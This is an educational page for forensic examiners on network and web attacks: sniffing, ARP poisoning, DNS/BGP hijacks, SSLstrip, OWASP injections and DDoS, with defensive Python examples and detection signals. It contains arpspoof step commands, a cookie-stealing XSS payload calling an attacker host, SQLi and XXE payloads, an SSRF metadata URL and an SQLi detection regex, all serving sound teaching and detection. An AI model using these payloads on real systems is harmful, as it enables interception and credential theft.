Network Attacks: Sniffing, ARP Poisoning, MITM, DDoS, XSS and SQLi
The network attack taxonomy for Indian digital forensic examiners: passive vs active sniffing, ARP and DNS spoofing, BGP hijacks, MITM and SSLstrip, OWASP Top 10 web attacks (XSS, SQLi, CSRF, SSRF, XXE), volumetric and application-layer DDoS, phishing and zero-days, with CERT-In incident response, banking DDoS during festival sales, and the I4C escalation path.
Network attacks against digital infrastructure fall into a finite, well-documented taxonomy: passive and active packet sniffing, address-layer spoofing (IP, MAC, ARP, DNS), man-in-the-middle interception, web application injection (SQLi, XSS, CSRF, SSRF, XXE), and volumetric or application-layer denial-of-service. ARP poisoning was first described in 1982, SQL injection was named by Jeff Forristal in 1998, and the Kaminsky DNS cache-poisoning bug was disclosed in 2008. Every quarter the I4C portal at cybercrime.gov.in still records fresh complaints whose root cause is one of these decades-old techniques applied to a new target, particularly at small Indian e-commerce and fintech operators that encounter the attacks without prior preparation. A digital forensic examiner's task is to read a packet capture or application log, attribute the incident to the correct attack family, identify the detection signal, and produce findings that feed into the CERT-In reporting chain under IT Act 2000 Section 70B.
Key takeaways
- Packet sniffing is the foundation under most other network attacks, and on a switched network the sniffer's reach is limited to its own port, broadcast domains, and any traffic diverted by ARP poisoning.
- ARP poisoning, SQL injection, and DNS cache poisoning are decades-old techniques that the I4C portal still records as recurring root causes in fresh Indian complaints each quarter.
- The CERT-In Direction of 28 April 2022 requires service providers, intermediaries, body corporates, and data centres in India to report incidents within a fixed window, making detection logs legally relevant.
- XSS and SQLi together dominate web-application attack filings, and the detection signal for each family is visible in HTTP request logs and packet captures if the examiner knows what pattern to filter for.
- NCIIPC and CERT-In under IT Act Section 70B form the Indian operational layer for network incident response, and an examiner's forensic report feeds directly into that reporting chain.
This topic covers the digital forensics network attack taxonomy, moving through each attack family from passive sniffing to web injection to volumetric DDoS, with the tools, protocol weaknesses, detection signals in packet captures, and mitigations relevant to Indian banking and government infrastructure. The Indian operational layer is CERT-In incident response under the IT Act 2000 Section 70B, the National Critical Information Infrastructure Protection Centre (NCIIPC), and the I4C citizen helpline 1930. Cross-links go to the wireless attack topic, the malware forensics topic, and the cyber crime taxonomy and IT Act 2000 topic.
By the end of this topic you will be able to:
- Classify a network attack as passive sniffing, active sniffing, spoofing, MITM, web-layer injection, or denial-of-service based on observable packet-capture evidence.
- Explain why ARP poisoning is scoped to a single broadcast domain and identify the Wireshark and arpwatch signals that confirm it in a forensic capture.
- Distinguish the three SQLi exfiltration styles (union-based, boolean blind, time-based blind) and state the parameterised-query mitigation each requires.
- Describe the SSLstrip downgrade attack mechanism and explain why HSTS and the browser preload list defeat it.
- Map an incident to the mandatory CERT-In reporting obligation under the 28 April 2022 Direction and identify the I4C/NCIIPC escalation path.
- Packet sniffing: Capture of network traffic from a wired tap, a switch SPAN port, or a Wi-Fi monitor-mode radio. Passive sniffing reads; active sniffing injects (ARP poisoning, port stealing) to redirect traffic past the sniffer.
- ARP poisoning: Sending forged ARP replies on a LAN to bind an attacker's MAC to a victim's IP in other hosts' ARP caches, redirecting their Layer 2 traffic. Scope is the local broadcast domain only.
- MITM (man-in-the-middle): Any attack in which the adversary sits between two endpoints and reads or modifies traffic. ARP poisoning, rogue access points, BGP hijacks and SSLstrip are all paths into MITM.
- DDoS (distributed denial of service): Service-denial attack sourced from many hosts at once. Volumetric (saturate bandwidth), protocol (exhaust state on stateful boxes), or application-layer (exhaust application resources).
- OWASP Top 10: Open Worldwide Application Security Project's ranking of the most common web application security risks, refreshed every 3 to 4 years. Current edition: 2021, with A03 Injection, A07 Identification and Authentication Failures, and others.
- CVE / KEV: Common Vulnerabilities and Exposures (MITRE-assigned identifier per public flaw); Known Exploited Vulnerabilities catalogue (CISA), which lists CVEs proven to be actively exploited in the wild.
Eavesdropping, packet sniffing and the passive-active split
Packet sniffing is the foundation under most other network attacks. A sniffer reads frames off the medium and feeds them to a dissector. On a wired switched network the sniffer's reach is limited to its own port, broadcast traffic, and whatever a managed switch's SPAN or RSPAN session is configured to mirror. On a Wi-Fi network in monitor mode a sniffer reads every frame on the chosen channel within radio range, encrypted or not.
The standard tool stack is small. Wireshark is the desktop dissector, with dissectors for over 3000 protocols and a TLS keylog import facility for decrypting captures when SSLKEYLOGFILE was set. tcpdump is the BSD-licensed command-line capture tool, the workhorse on Linux servers. tshark is Wireshark's command-line sibling, used for scripted capture and BPF filtering. Ettercap is the active-MITM workhorse with built-in ARP poisoning, DNS spoofing, and SSLstrip plug-ins. Bettercap is the modern Go-based replacement for Ettercap, scripted in Caplets. Cain & Abel was the historical Windows toolkit, now retired but still cited in older reference materials. Aircrack-ng is the Wi-Fi capture and crack suite.
Passive sniffing leaves no observable trace on the wire. The sniffer's network card is in promiscuous mode (wired) or monitor mode (Wi-Fi), it does not transmit, and the only way to catch a passive sniffer is physical inspection or, on some old systems, a latency-based test that exploits ARP and ICMP response times when the kernel is busy with extra frames. Active sniffing transmits forged frames to coax traffic into reaching the sniffer's port: ARP poisoning is the canonical example, but port stealing (the attacker keeps re-claiming a switch port for its own MAC) and STP root-bridge attacks (the attacker advertises itself as root and reshapes the spanning tree) also count.
Spoofing: IP, MAC, ARP, DNS, email
Spoofing describes attacks in which the adversary forges a source identifier. Each layer of the stack has a corresponding spoofing technique.
| Spoof | Layer | What is forged | Detection signal |
|---|---|---|---|
| IP spoofing | Network (3) | Source IPv4/IPv6 | Egress traffic from outside the BCP38 allowed prefixes |
| MAC spoofing | Data Link (2) | Source MAC | Vendor OUI mismatch with device class; sudden MAC change on a port |
| ARP spoofing | Data Link (2) | ARP reply binding wrong MAC to IP | Duplicate IP claims; gratuitous ARP storm; arpwatch alert |
| DNS spoofing | Application (7) | Response to DNS query (cache poison or local hijack) | Resolver answer differs from authoritative; DNSSEC validation fail |
| Email spoofing | Application (7) | From header, Return-Path, envelope sender | SPF / DKIM / DMARC failure in Received-SPF header |
IP spoofing is the original attack, made famous in 1995 when Kevin Mitnick used it to impersonate a trusted host against Tsutomu Shimomura. The mitigation is BCP38 (RFC 2827), source-address filtering at the network ingress: a provider drops outbound packets whose source IP does not belong to the customer's allocated prefix. Indian Tier-1 ISPs largely implement BCP38 on their downstream peering, which is why IP-spoofed reflection attacks at scale are mostly sourced from misconfigured providers abroad.
MAC spoofing is a one-line command (`ip link set dev eth0 address aa:bb:cc:dd:ee:ff` on Linux, `macchanger`, or the Wi-Fi privacy MAC randomisation built into every modern phone). It defeats simple MAC filtering on home routers and is routine for any attacker on a captive portal or hotel Wi-Fi.
ARP spoofing is the LAN-scoped attack covered in detail in the next section. DNS spoofing is covered in the DNS attacks section below. Email spoofing is what every romance scam and CEO fraud is built on: forging the From header to look like a trusted sender. SPF (Sender Policy Framework, RFC 7208) lists which IPs are authorised to send for a domain. DKIM (DomainKeys Identified Mail, RFC 6376) cryptographically signs the message. DMARC (RFC 7489) tells receivers what to do when SPF or DKIM fails. A receiving mail server that enforces strict DMARC on gov.in mail rejects most spoofing attempts at the perimeter.
ARP poisoning and the MITM toolkit
ARP, the Address Resolution Protocol (RFC 826), maps a Layer 3 IPv4 address to a Layer 2 MAC on the local segment. A host that wants to talk to 192.168.1.1 broadcasts an ARP request ("who has 192.168.1.1, tell 192.168.1.50"); the router replies with its MAC; the requester caches the binding. ARP has no authentication. Any host on the segment can send an unsolicited (gratuitous) ARP reply claiming to own any IP, and most operating systems happily update their caches.
ARP poisoning exploits that. The attacker sends two streams of gratuitous ARP replies on the LAN: one to the gateway claiming victim_IP is at attacker_MAC, and one to the victim claiming gateway_IP is at attacker_MAC. After both caches update, every packet between the victim and the gateway transits the attacker, who forwards the traffic onward to maintain the illusion of normal connectivity and reads or modifies it in flight.

- Reconnaissance: the attacker enumerates the LAN with arp-scan or a Bettercap probe to find the gateway and the target. Takes seconds on a /24.
- Forge ARP replies: run `arpspoof -i wlan0 -t 192.168.1.50 192.168.1.1` (target the victim, telling it the attacker is the gateway) and the reverse.
- Enable forwarding: `sysctl -w net.ipv4.ip_forward=1` on the attacker so packets continue to the real gateway, hiding the attack from the user.
- Capture or modify: pipe through Wireshark for read-only capture, or through Bettercap modules (`http.proxy`, `https.proxy`, `dns.spoof`) for active modification.
- Restore: send corrective ARP replies on exit to re-bind real MACs to real IPs, leaving the LAN as found (rarely done by attackers in the wild).
The standard ARP poisoning tools are arpspoof (part of the dsniff suite), Ettercap (with the arp plug-in), Bettercap (arp.spoof module), and historically Cain & Abel on Windows. Detection runs at two levels. arpwatch (LBNL, Unix) logs new MAC-IP bindings on the local segment and emails alerts when a binding changes; sudden alerts during business hours are a high-signal ARP spoofing indicator. ArpON is a Linux kernel-level defender that statically pins gateway bindings. X-ARP is a Windows-side equivalent. Enterprise switches implement Dynamic ARP Inspection (DAI) on Cisco gear, which validates ARP replies against a DHCP snooping binding table and drops mismatches at the switchport.
The scope is the broadcast domain only. ARP poisoning works within a single VLAN; it does not cross a router. An attacker on a corporate guest VLAN cannot poison ARP for hosts on the production VLAN. The forensic detection in a capture is the appearance of duplicate IP claims with different MACs in close succession, plus a sudden re-route of the victim's traffic through an unexpected MAC. The same MITM position can be obtained from a rogue access point on Wi-Fi, covered in the wireless attack topic.
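The duplicate-IP signal described above, as an added example that is not part of the original page: a small Python detector that parses raw Ethernet/ARP frames with struct and flags any IP claimed by more than one MAC in ARP replies within a window. The frames, MACs and IPs are constructed for the demo.

```python
"""ARP poisoning detector over raw Ethernet frames.

Added example, not code from the original page or from any tool it names: parses
Ethernet II + ARP headers with struct and reports every IP claimed by more than
one MAC in ARP replies within a short window (the duplicate-IP signal above).
All MAC and IP values are constructed for the demo.
"""
import struct
from collections import defaultdict

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(eth_src: bytes, sender_mac: bytes, sender_ip: str,
                    target_mac: bytes, target_ip: str) -> bytes:
    """Construct an Ethernet frame carrying an IPv4 ARP reply (RFC 826)."""
    eth = struct.pack("!6s6sH", target_mac, eth_src, ETHERTYPE_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                      sender_mac, ip_to_bytes(sender_ip),
                      target_mac, ip_to_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an IPv4 ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode, sha, spa, _, _ = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return opcode, sha.hex(":"), ".".join(str(b) for b in spa)


def detect_arp_poisoning(frames, window_s: float = 60.0) -> dict:
    """Return {ip: sorted MACs} for every IP claimed by more than one MAC within window_s.

    frames: iterable of (timestamp_seconds, raw_frame). Only ARP replies count,
    since a poisoner works by injecting forged (often gratuitous) replies.
    """
    claims = defaultdict(list)                       # ip -> [(ts, mac), ...]
    for ts, frame in frames:
        parsed = parse_arp(frame)
        if parsed is not None and parsed[0] == ARP_REPLY:
            claims[parsed[2]].append((ts, parsed[1]))

    alerts = {}
    for ip, seen in claims.items():
        seen.sort()
        for i, (ts, _) in enumerate(seen):
            macs = {mac for t, mac in seen[i:] if t - ts <= window_s}
            if len(macs) > 1:
                alerts[ip] = sorted(macs)
                break
    return alerts


# Constructed LAN: a gateway, a victim and a rogue host (values made up).
GATEWAY_MAC = bytes.fromhex("00005e000101")
VICTIM_MAC = bytes.fromhex("0200aabbcc01")
ROGUE_MAC = bytes.fromhex("0200deadbeef")

BENIGN_CAPTURE = [
    (0.0, build_arp_reply(GATEWAY_MAC, GATEWAY_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.50")),
    (0.2, build_arp_reply(VICTIM_MAC, VICTIM_MAC, "192.168.1.50", GATEWAY_MAC, "192.168.1.1")),
    (5.0, b"\xff" * 6 + VICTIM_MAC + b"\x08\x00" + b"\x00" * 28),   # IPv4 frame, ignored
]

# Twelve seconds later the rogue host injects gratuitous replies binding both IPs to its MAC.
POISONED_CAPTURE = BENIGN_CAPTURE + [
    (12.0, build_arp_reply(ROGUE_MAC, ROGUE_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.50")),
    (12.1, build_arp_reply(ROGUE_MAC, ROGUE_MAC, "192.168.1.50", GATEWAY_MAC, "192.168.1.1")),
    (13.0, build_arp_reply(ROGUE_MAC, ROGUE_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.50")),
]

if __name__ == "__main__":
    print("benign capture:", detect_arp_poisoning(BENIGN_CAPTURE))
    for ip, macs in detect_arp_poisoning(POISONED_CAPTURE).items():
        print(f"ALERT {ip} claimed by {len(macs)} MACs: {', '.join(macs)}")
```

Real captures are read with a pcap library instead of the constructed list, and the window should be tuned to the site's DHCP lease churn so a legitimate NIC swap does not alert.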
DNS attacks, BGP hijacks and SSLstrip downgrade
DNS spoofing has three operational forms. Local LAN DNS spoofing uses ARP poisoning to put the attacker on the path, then rewrites DNS responses in flight (Bettercap's dns.spoof module is a one-liner). Cache poisoning targets a recursive resolver: the attacker races the legitimate authoritative reply by guessing the resolver's source port and the 16-bit transaction ID and injecting a malicious reply first. Dan Kaminsky's 2008 work showed that the resolver could be tricked into accepting glue records for an entire zone in seconds when source-port randomisation was missing, and forced every major DNS implementation to deploy source-port randomisation within weeks. DNSSEC (RFC 4033 onward) signs DNS records with public-key cryptography; a validating resolver rejects unsigned or invalidly signed replies. DoH (DNS over HTTPS, RFC 8484) and DoT (DNS over TLS, RFC 7858) encrypt the query channel to the resolver, defeating local LAN DNS spoofing but not cache poisoning.
Routing table poisoning at the BGP layer changes the path that traffic takes between autonomous systems. Two cases shape the textbook:
- YouTube vs Pakistan, February 2008: Pakistan Telecom (AS 17557) announced a more specific BGP prefix for YouTube's IP range to blackhole the service domestically, but the announcement leaked to its upstream (PCCW, AS 3491) and propagated globally, taking YouTube offline for about 2 hours.
- Amazon Route 53 hijack, April 2018: an attacker hijacked the BGP prefix for Route 53's authoritative DNS, redirected MyEtherWallet queries to a server they controlled, and stole around 152,000 USD of Ether before the route was withdrawn.
RPKI (Resource Public Key Infrastructure, RFC 6480) signs BGP route origin claims and lets validating routers reject unsigned or invalid announcements. Indian carriers Tata Communications and Reliance Jio publish ROAs (Route Origin Authorizations) on most of their prefixes as of 2025.
SSLstrip (Moxie Marlinspike, 2009) is the canonical HTTPS downgrade attack. The attacker, already in a MITM position, intercepts the user's first plain HTTP request to a site, fetches the real HTTPS page on the user's behalf, rewrites every https:// link in the returned HTML to http://, and serves the modified plaintext page to the victim. The user's address bar shows http:// rather than the padlock, but most users miss it. Mitigations are HSTS (HTTP Strict Transport Security, RFC 6797), where the server tells the browser to refuse plain-HTTP connections to it for a set time; HSTS preload lists, where popular domains are baked into every shipping browser so that even the first visit is protected; and HTTPS-only mode, on by default in Firefox and Edge as of 2024. Downgrade attacks more broadly include TLS version downgrades like POODLE (CVE-2014-3566) and Logjam (CVE-2015-4000), which exploited acceptance of older SSL/TLS versions or weak Diffie-Hellman groups.
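Why HSTS closes the SSLstrip window, as an added example that is not code from the original page or from any real browser: a minimal model of a browser's HSTS policy store that parses the Strict-Transport-Security header and rewrites http:// navigations to https:// before any request leaves the machine. Hostnames are constructed; the one-year max-age threshold is the published hstspreload.org submission requirement.

```python
"""A minimal browser-side HSTS policy store: why HSTS closes the SSLstrip window.

Added example, not code from the original page or from any real browser. It
models what a browser does with a Strict-Transport-Security header (RFC 6797)
and with a preload entry: once a host has a live policy, an http:// navigation
is rewritten to https:// before any request leaves the machine, so the plain
first request that SSLstrip relies on never happens. Hostnames are constructed.
"""
from urllib.parse import urlsplit, urlunsplit

ONE_YEAR = 31_536_000   # minimum max-age hstspreload.org requires for submission


def parse_hsts(header: str):
    """Parse an STS header into (max_age, include_subdomains, preload); None if malformed."""
    max_age, include_sub, preload = None, False, False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.lower(), value.strip().strip('"')
        if name == "max-age" and value.isdigit():
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    return None if max_age is None else (max_age, include_sub, preload)


def preload_eligible(header: str) -> bool:
    """Meets the preload-list requirements: one-year max-age, includeSubDomains, preload."""
    parsed = parse_hsts(header)
    return parsed is not None and parsed[0] >= ONE_YEAR and parsed[1] and parsed[2]


class HstsStore:
    def __init__(self, preloaded=()):
        # host -> (expiry, include_subdomains); a preload entry is a permanent
        # includeSubDomains policy that protects even the very first visit.
        self.policies = {h: (float("inf"), True) for h in preloaded}

    def observe(self, host: str, header: str, now: float) -> None:
        """Record the policy from an HTTPS response (browsers ignore STS over plain HTTP)."""
        parsed = parse_hsts(header)
        if parsed is None:
            return
        max_age, include_sub, _ = parsed
        if max_age == 0:
            self.policies.pop(host, None)          # max-age=0 tells the browser to forget
        else:
            self.policies[host] = (now + max_age, include_sub)

    def _covered(self, host: str, now: float) -> bool:
        labels = host.lower().split(".")
        for i in range(len(labels)):
            policy = self.policies.get(".".join(labels[i:]))
            if policy and policy[0] > now and (i == 0 or policy[1]):
                return True
        return False

    def navigate(self, url: str, now: float) -> str:
        """Return the URL the browser actually requests: upgraded when a policy covers the host."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self._covered(parts.hostname or "", now):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


def simulate(header: str, later: float) -> tuple:
    """Observe `header` from shop.example at t=0, then navigate to two URLs at t=later."""
    store = HstsStore()
    store.observe("shop.example", header, now=0)
    return (store.navigate("http://shop.example/login", now=later),
            store.navigate("http://api.shop.example/", now=later))


if __name__ == "__main__":
    print(HstsStore().navigate("http://shop.example/login", now=0))    # first visit: no policy yet
    print(simulate("max-age=31536000; includeSubDomains; preload", later=100))
    print(HstsStore(preloaded=["bank.example"]).navigate("http://www.bank.example/", now=0))
```

The first print shows the gap the attack lives in: a host the browser has never seen over HTTPS, and that is not preloaded, still gets its first request in the clear.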
Web jacking combines DNS spoofing with phishing: the attacker either poisons a resolver or compromises a registrar account to repoint a domain to their own server, then serves a clone of the original site. The 2010 Baidu hijack via the Iranian Cyber Army is the canonical example; the 2018 MyEtherWallet incident above is the BGP variant.
Web application attacks: XSS, SQLi, CSRF, SSRF, XXE
A large proportion of casework against Indian e-commerce, fintech, and government portals involves the web application layer. The current OWASP Top 10 (2021 edition, the active list while OWASP prepares the 2025 refresh) ranks ten risk categories. Each maps to one or more attack technique families.
| # | OWASP 2021 category | Example exploit | Primary mitigation |
|---|---|---|---|
| A01 | Broken Access Control | IDOR; horizontal/vertical privilege escalation | Server-side authorisation per request, deny by default |
| A02 | Cryptographic Failures | Plaintext passwords, weak hashing, exposed keys | bcrypt/argon2, TLS 1.3, secret managers |
| A03 | Injection | SQLi, command injection, LDAP injection | Parameterised queries, allow-list input validation |
| A04 | Insecure Design | No threat model, no rate limit on login | Threat modelling, secure-by-design patterns |
| A05 | Security Misconfiguration | Default credentials, dir listing, debug endpoints | Hardened baseline, automated config scans |
| A06 | Vulnerable and Outdated Components | Log4Shell, Spring4Shell | SBOM, automated CVE scanning |
| A07 | Identification and Authentication Failures | Credential stuffing, weak MFA | MFA, rate limit, breached-password lists |
| A08 | Software and Data Integrity Failures | Untrusted CI plug-ins, insecure deserialisation | Signed artifacts, SLSA build provenance |
| A09 | Security Logging and Monitoring Failures | No alerts on brute-force or anomalous access | Centralised logging, SIEM, alerting |
| A10 | SSRF (Server-Side Request Forgery) | Hit AWS metadata service from a web fetch | Outbound deny-list, network segmentation |
Cross-Site Scripting (XSS) is OWASP A03 Injection's web sibling. Three sub-types:
- Reflected XSS: the payload arrives in a request parameter and is echoed back into the response without escaping. Example: `https://example.in/search?q=<script>fetch('//attacker/'+document.cookie)</script>`. Single-victim, link-driven.
- Stored (persistent) XSS: the payload is saved server-side (a comment, a profile bio) and served to every visitor. Higher impact; one injection point hits all readers.
- DOM-based XSS: the payload never reaches the server. Client-side JavaScript reads `document.location` or `window.name` and writes it into the DOM without sanitisation. Indistinguishable from reflected XSS in the network capture; only static or dynamic analysis of the JS reveals the sink.
Mitigation is output encoding by context (HTML body, attribute, JS string, URL, CSS each need different escaping), input validation (allow-list per field), and a Content-Security-Policy header that allow-lists the sources of executable script. CSP does not replace sanitisation but limits the impact when sanitisation fails.
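Output encoding by context, as an added example that is not from the original page: the reflected payload quoted above rendered into HTML body, attribute, JavaScript-string and URL contexts with the escaping each needs, beside the unsafe rendering, plus a nonce-based CSP header. The template, nonce and attacker hostname are constructed.

```python
"""Context-aware output encoding for the reflected search payload quoted above.

Added example, not code from the original page. The same untrusted search term
is rendered into four output contexts (HTML body, quoted attribute, JavaScript
string, URL query), each with the escaping that context needs, next to the
unsafe rendering for contrast, and the response carries a nonce-based
Content-Security-Policy. The page template and the attacker host are constructed.
"""
import html
import json
import secrets
from urllib.parse import quote

PAYLOAD = "<script>fetch('//attacker/'+document.cookie)</script>"


def encode_html_body(value: str) -> str:
    """Text between tags: &, < and > must be escaped."""
    return html.escape(value, quote=False)


def encode_html_attr(value: str) -> str:
    """Inside a quoted attribute value: the quote characters must be escaped as well."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Inside a <script> string literal: JSON-encode, then escape < > & as \\u003c-style
    sequences so a literal '</script>' inside the data cannot terminate the script block."""
    return (json.dumps(value).replace("<", "\\u003c")
            .replace(">", "\\u003e").replace("&", "\\u0026"))


def encode_url_param(value: str) -> str:
    """Inside a URL query value: percent-encode everything except unreserved characters."""
    return quote(value, safe="")


def render_unsafe(query: str, nonce: str) -> str:
    """The reflected-XSS bug: the parameter is echoed straight into the markup."""
    return f'<p>Results for {query}</p>\n<script nonce="{nonce}">var q = "{query}";</script>'


def render_safe(query: str, nonce: str):
    """Return (html, csp_header) with the query encoded for each context it lands in."""
    page = (
        f"<p>Results for {encode_html_body(query)}</p>\n"
        f'<input name="q" value="{encode_html_attr(query)}">\n'
        f'<a href="/search?q={encode_url_param(query)}&amp;page=2">Next</a>\n'
        f'<script nonce="{nonce}">var q = {encode_js_string(query)};</script>'
    )
    # CSP: only scripts carrying this response's nonce may run, so a payload that
    # slips past encoding still has no executable sink.
    csp = f"default-src 'self'; script-src 'nonce-{nonce}'; object-src 'none'; base-uri 'none'"
    return page, csp


def foreign_script_count(rendered: str, nonce: str) -> int:
    """Number of <script openings in the output that do not carry our nonce."""
    return rendered.count("<script") - rendered.count(f'<script nonce="{nonce}"')


if __name__ == "__main__":
    nonce = secrets.token_urlsafe(16)
    page, csp = render_safe(PAYLOAD, nonce)
    print(page)
    print("Content-Security-Policy:", csp)
    print("foreign scripts, unsafe:", foreign_script_count(render_unsafe(PAYLOAD, nonce), nonce))
    print("foreign scripts, safe:  ", foreign_script_count(page, nonce))
```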
SQL Injection (SQLi) breaks out of the SQL string context and lets the attacker run arbitrary database queries. Three styles by exfiltration channel:
- Union-based: `' UNION SELECT username, password FROM users --` appended to a numeric ID parameter, where the response renders the union row. Fast.
- Boolean blind: the response differs visibly when the injected condition is true vs false; the attacker bit-bashes data one boolean at a time. Example: `' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)='a' --`.
- Time-based blind: the condition triggers a deliberate delay (`IF(condition, SLEEP(5), 0)`); the attacker reads the answer from the response time. Slow but works when no other channel is visible.
sqlmap is the standard automated exploitation tool, supporting all three styles and dozens of database fingerprints. The mitigation is parameterised queries (prepared statements with bound parameters), which separate the SQL template from the user-supplied values so that no input can break out of the string context. ORM frameworks like Django ORM, SQLAlchemy and Hibernate parameterise by default; a raw psycopg2 call such as `cursor.execute("SELECT ... WHERE id=" + user_input)` does not.
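The union-based payload against concatenated SQL beside the parameterised fix, as an added example that is not part of the original page, using an in-memory SQLite database with constructed tables; a crude log-triage regex for the three exfiltration styles is included for the examiner reading request logs.

```python
"""Union-based SQLi: string concatenation beside the parameterised fix.

Added example, not code from the original page. It builds an in-memory SQLite
database with constructed products and users tables (the password column holds
placeholder strings), then runs the union payload quoted above through a lookup
that concatenates the value into the SQL, the anti-pattern the paragraph names,
and through one that binds it as a parameter.
"""
import re
import sqlite3
from urllib.parse import unquote_plus

UNION_PAYLOAD = "' UNION SELECT username, password FROM users --"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Widget', 99.0), (2, 'Gadget', 149.0);
        INSERT INTO users VALUES (1, 'alice', 'hash-placeholder-1'),
                                 (2, 'bob', 'hash-placeholder-2');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Concatenation: the quote in the input closes the string literal and the rest is SQL."""
    sql = "SELECT name, price FROM products WHERE name = '" + name + "'"
    return sorted(conn.execute(sql).fetchall())


def lookup_parameterised(conn: sqlite3.Connection, name: str) -> list:
    """Bound parameter: the driver sends the SQL template and the value separately."""
    sql = "SELECT name, price FROM products WHERE name = ?"
    return sorted(conn.execute(sql, (name,)).fetchall())


# Crude request-log heuristic for the three exfiltration styles above. It is a
# triage filter for an examiner reading access logs, not a WAF: it misses
# obfuscated variants and will flag some legitimate text.
SQLI_PATTERNS = re.compile(
    r"\bunion\b\s+(all\s+)?select\b"           # union-based
    r"|'\s*(and|or)\s*\(?\s*select\b"          # boolean blind
    r"|\bsleep\s*\(",                          # time-based
    re.IGNORECASE,
)


def looks_like_sqli(query_string: str) -> bool:
    """True if a URL-decoded query string matches one of the SQLi signatures."""
    return SQLI_PATTERNS.search(unquote_plus(query_string)) is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:    ", lookup_vulnerable(db, "Widget"))
    print("vulnerable, union payload:   ", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterised, union payload:", lookup_parameterised(db, UNION_PAYLOAD))
    print("log triage:", looks_like_sqli("q=%27+UNION+SELECT+username%2C+password+FROM+users+--"))
```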
CSRF (Cross-Site Request Forgery) makes a logged-in user's browser submit an authenticated request to a target site without their knowledge. The attacker hosts a hidden form on attacker.com that POSTs to bank.in/transfer; the victim's browser sends the bank session cookie automatically. Mitigations are anti-CSRF tokens (a random per-session value the server embeds in forms and validates on submit) and SameSite cookies (Lax or Strict, which restrict cookie sending on cross-origin POSTs). Modern browsers default to SameSite=Lax for cookies that don't set the attribute, which has killed most casual CSRF in the wild.
SSRF (Server-Side Request Forgery) makes the server fetch a URL the attacker chooses. The textbook target is the AWS Instance Metadata Service at 169.254.169.254/latest/meta-data/iam/security-credentials/, which returns temporary IAM credentials. The 2019 Capital One breach was an SSRF hit on AWS metadata that exfiltrated credentials and then 100 million customer records. AWS IMDSv2 requires a session-token PUT first, blocking the trivial SSRF path; IMDSv1 is still enabled by default on older AMIs and is widely exploitable.
XXE (XML External Entity) abuses XML parsers that resolve external entities. An XML document with `<!ENTITY xxe SYSTEM "file:///etc/passwd">` and a reference `&xxe;` reads the server's password file when parsed by a vulnerable processor. The mitigation is disabling external entity resolution; modern libxml2, .NET's XmlReader and Java's SAXParser ship with it off by default since 2014-2015.
DoS and DDoS: volumetric, protocol and application-layer
Denial-of-service attacks are classified by the resource they exhaust.
Volumetric attacks saturate the target's upstream bandwidth. The attack volume is measured in bps (sometimes pps for packet rate). UDP flood, ICMP flood and amplified reflection attacks fall here. Reflection/amplification is the high-leverage technique: the attacker sends a small spoofed-source query to a misconfigured service (DNS open resolver, NTP monlist, memcached UDP, SSDP) and the service sends a much larger reply to the spoofed victim. The amplification factor is the ratio of reply to query: DNS ANY queries amplify roughly 28x to 54x; NTP monlist amplifies 500x to 580x; memcached amplifies up to 51,000x and was responsible for the 1.35 Tbps GitHub attack in February 2018 and the 1.7 Tbps NetScout attack in March 2018.
Protocol attacks exhaust state on stateful boxes (load balancers, firewalls, application servers). SYN flood sends TCP SYNs without completing the handshake; the target holds half-open connection state until the SYN backlog fills. Mitigation: SYN cookies (Linux `tcp_syncookies`), which encode the connection state in the SYN-ACK sequence number so no backlog entry is needed. Fragmentation attacks send overlapping or oversized IP fragments that confuse reassembly (Teardrop, Ping of Death; mostly dead since the 2000s but resurface on poorly maintained embedded stacks).
Application-layer attacks exhaust application resources at low bandwidth. Slowloris opens many HTTP connections and sends partial headers, never finishing the request; a single laptop on a 10 Mbps link can take down an unhardened Apache server. HTTP GET flood uses real-looking GET requests to fetch expensive resources (search pages, dynamic reports); a botnet of compromised home routers serves the requests, and the target cannot distinguish them from legitimate users without rate limiting or behavioural fingerprinting.
The botnet of record is Mirai (Anna-Senpai source code release, September 2016), which compromised IoT devices (DVRs, IP cameras, home routers with default Telnet credentials) and produced the September 2016 attacks against Krebs on Security (around 620 Gbps), OVH (around 1 Tbps), and the October 2016 Dyn attack (1.2 Tbps) that took Twitter, Reddit, GitHub and Spotify offline for hours.
DDoS mitigation runs at three layers. Edge scrubbing (Cloudflare, Akamai, Imperva, AWS Shield Advanced) absorbs the attack on a globally distributed network and forwards clean traffic to the origin. ISP null-routing (BGP flowspec or RTBH, Remote Triggered Black Hole) drops traffic to the attacked IP at the carrier edge, which keeps the rest of the network up at the cost of the attacked service. Application-layer rate limiting (NGINX limit_req, Cloudflare rules, application WAF) caps request rates per IP, per session token or per behavioural fingerprint.
An attacker on a corporate guest VLAN attempts ARP poisoning against a host in the production VLAN. What is the outcome?
Frequently asked questions
What is the difference between passive and active packet sniffing?
How do I detect ARP poisoning in a forensic capture?
What was the Kaminsky DNS bug and why did it matter?
